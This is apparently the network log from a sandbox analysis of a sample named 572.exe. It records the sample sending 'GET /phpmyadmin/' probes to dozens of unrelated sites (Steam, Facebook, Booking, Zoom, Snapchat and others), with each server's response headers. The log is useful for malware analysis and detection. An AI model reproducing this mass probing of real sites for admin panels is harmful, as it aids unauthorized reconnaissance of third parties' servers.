2024-02-05 11:14:50 UTC | 1369 | IN | Data Ascii: in.js"></script></head><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no" /><meta name="theme-color" content="#000000" /><link rel="shortcut icon" href="/favicon.ico" /><title>FACEIT Connect</
2024-02-05 11:14:50 UTC | 464 | IN | Data Ascii: == 'loading') {document.onreadystatechange = prev;handler();}};}})();</script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR
2024-02-05 11:14:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 52563 | 8.45.52.148 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: genshin.mihoyo.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 522 | IN | HTTP/1.1 302 Moved Temporarily
Server: Tuser
Content-Length: 0
Connection: close
Date: Mon, 05 Feb 2024 11:14:50 GMT
Location: /en
Ali-Swift-Global-Savetime: 1707131690
Via: cache17.l2us2[315,315,302-0,M], cache40.l2us2[315,0], ens-cache6.us19[328,327,302-0,M], ens-cache13.us19[329,0]
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Mon, 05 Feb 2024 11:14:50 GMT
X-Swift-CacheTime: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                EagleId: 082d34a117071316902976969e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 52516 | 184.25.164.103 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 183 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 233 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://store.steampowered.com/
Strict-Transport-Security: max-age=10368000
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 52554 | 192.185.5.23 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:50 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=538a39c5bfd5b3f5ecb61012152f863d; path=/
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
14 | 192.168.2.6 | 52572 | 31.13.65.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: es-la.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 389 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/phpmyadmin/?locale=es_LA&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: Bd08GB2tG8sZrIizAB6Q8Qrb0pWqn3Ctx+QIKK0UbsSIyYo8zT0FFuXgDlSabbpcYgVN5EI19Hflo25ryN9VBg==
Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 52585 | 195.85.23.95 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 177 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 589 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
location: https://ro.bongacams.com/phpmyadmin
x-bc: ded6949
x-zone: 3-web22
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.bongacams.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 850abb6928251d6c-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:50 UTC | 162 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 54593 | 3.161.150.89 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 2006 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
server: envoy
date: Mon, 05 Feb 2024 11:14:50 GMT
content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tg
content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tg; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-6ejAOTd8UT2ZFAN' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
x-xss-protection: 1; mode=block
strict-transport-security: max-age=86400; includeSubDomains
X-Cache: Error from cloudfront
Via: 1.1 85d554a60ac318933f765b1c3e116f30.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: QU5cviGa22iKRK-3SQwiISGFojqt13VxSKiT7FrUy1AD_vLjTgkjVQ==
2024-02-05 11:14:51 UTC | 14378 | IN | Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:14:51 UTC | 7574 | IN | Data Ascii: untry_code":"lk"},{"country_code":"lr","prefix":"+231","name":"Liberia"},{"name":"Lesotho","prefix":"+266","country_code":"ls"},{"prefix":"+370","name":"Lithuania","country_code":"lt"},{"country_code":"lu","prefix":"+352","name":"Luxembourg"},{"country_co
2024-02-05 11:14:51 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 52556 | 87.233.198.20 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 186 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: idp.uitgeverij-deviant.nl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 976 | IN | HTTP/1.1 404 Not Found
cache-control: no-store,no-cache
pragma: no-cache
transfer-encoding: chunked
content-type: text/html; charset=utf-8
server:
request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefba
content-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-vj3b31ZXmcuixZZGEZllBy8vGMrJQ3aG8oGiKWLE4Hw=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforce
x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By:
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                set-cookie: SERVERID=api02; path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                connection: close
2024-02-05 11:14:51 UTC | 2114 | IN | Data Ascii: 836<!DOCTYPE html><html lang="nl-NL"> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"/> <link rel="apple-touch-icon" sizes="180x180" href="/app


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 54306 | 31.13.65.7 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 958 | IN | HTTP/1.1 400 Bad Path
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Proxy-Status: proxy_internal_response; e_isproxyerr="AcLuddse5mXFu3yrQq-TMTvQpq-oAFjwM7f6vV-DTjvdhKV8DFTDQEhUmrupfg"; e_clientaddr="AcKN0Z1g-hbEgO95KwuKScjDMEO5ktyqwEEemRKJQmkaMHd-T_GncvggOMtVF_ex3TVuD0HJIec-N7lt"; e_fb_vipport="AcKNkfvnl7xkZKpfTr5OePIQgCiW3N3QGFtxAaQdt1dRZJjBQSiQxxyJi2uP"; e_fb_vipaddr="AcLIy2awiFp3ydMZKAXHhxZS9D8vvO-bcIUigDocAcWpm_WC1f5ufQrZTTyxynqsL3CzaA"; e_fb_requesthandler="AcLev9on-Ebf9JG-TaZQMRQpcODNwfR61cIlXXF6-frMkRxDYcwIykUA0L-UFh1ZHMRdJMFkMCWpbenb"; e_fb_builduser="AcIRA8ucubz5Ri3jYnr4rXxe59VdcPW_7rqhJ4jg0IUDrNa-G2Of8CR2mZzwqjY0DTs"; e_fb_binaryversion="AcLfiBt_BlhXlexZHo-rcA4vF3MwvIFWVckYUyDRI5ypw5SGvG3QinC9xD3SEIRW6-JLI56PdMD8hHLwwrnL25zzW-LQKpf3y0g"; e_proxy="AcKnBR_Jvz8BDQfQHJrXmzPU2_EafjsrxZ36X8dO8FRgGWYEJUuVjBoWzsqh9VKM3gTYT49vJFSr8aac"
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2959
2024-02-05 11:14:50 UTC | 1 | IN | Data Ascii: <
2024-02-05 11:14:50 UTC | 2958 | IN | Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 52550 | 3.141.96.53 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 113 | IN | HTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 52549 | 3.134.125.175 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 190 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 249 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 4bf33280bf5f3bd0836cbba6add9d4d1
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-02-05 11:14:51 UTC | 937 | IN | Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
2024-02-05 11:14:51 UTC | 1498 | IN | Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 54623 | 104.22.43.158 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 231 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6d0f412439-ATL
2024-02-05 11:14:51 UTC | 202 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
2024-02-05 11:14:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 54726 | 3.163.115.86 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:50 UTC | 178 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: connect.appen.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 375 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 766
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 eff9b403ff1afb509ff28dd4b9bdc7f0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: oWThfJ1alA3xaxiLWODa5M3FfEGIyRAgbACjLGXribVwloAIYPQFgQ==
2024-02-05 11:14:51 UTC | 766 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 54878 | 172.67.170.147 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 576 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ThDNKGDSoMVOFXVBpiNJR7oFN3%2FQk82qNnXV%2BPR27TGOoecqDbiQwmPTcoqhKgxuCC2%2F21Nrg2vhpOuLzbFpJn9PlKUKJQ5oSRZmTssqaWF71lugaXxLN2LyFWfy%2FHvCfat5KXrbGu8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6d8f0d7b9c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:51 UTC | 168 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
2024-02-05 11:14:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 54775 | 170.114.52.4 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 1303 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_3bf5fc9c9ff16db8b8a5fcc02f1fb359
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-xGfoX8U0T-qMtRIqaVnNiQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                x-zm-zoneid: VA2
                                                                                                                                                                                                                                                                                                                                                                content-language: en-US
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly


Session ID: 25
Source IP: 192.168.2.6
Source Port: 54590
Destination IP: 34.149.46.130
Destination Port: 443
PID: 524
Process: C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  182  OUT  GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  5747  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=a144e177-09e4-4e33-ab14-8346afc4f347; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
